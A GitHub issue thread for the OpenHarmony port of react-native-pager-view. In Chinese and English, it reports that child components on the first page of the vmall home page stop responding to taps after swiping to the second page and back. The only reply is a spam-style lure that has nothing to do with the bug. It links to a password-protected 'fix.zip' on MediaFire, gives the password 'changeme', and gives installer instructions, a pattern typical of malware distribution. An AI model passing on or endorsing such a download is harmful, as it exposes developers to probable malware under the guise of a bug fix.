### ISSUE TITLE
vmall首页滑动的时候从第一个页面滑动到第二个页面再滑回来，出现无法点击子组件问题

### ISSUE THREAD

**Issue by yuangerep** [react-native-oh-library/react-native-pager-view#35]
### 描述 / Description

vmall首页滑动的时候从第一个页面滑动到第二个页面再滑回来，出现无法点击子组件问题。

### 复现步骤 / Steps to reproduce

1.打开vmall首页
2.从第一个页面滑动到第二个页面再滑回来。
3.点击第一个页面的控件，无法点击。

### 库版本 / Library version

6.2.3-0.2.4

### React Native OpenHarmony version

0.72.27

### 构建类型 / Build type

Release app & production bundle

### 设备 / Device

Real device

### 设备版本 / Device model

mate60 pro 3.0.0.29

### 已悉知 / Acknowledgements

Yes

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
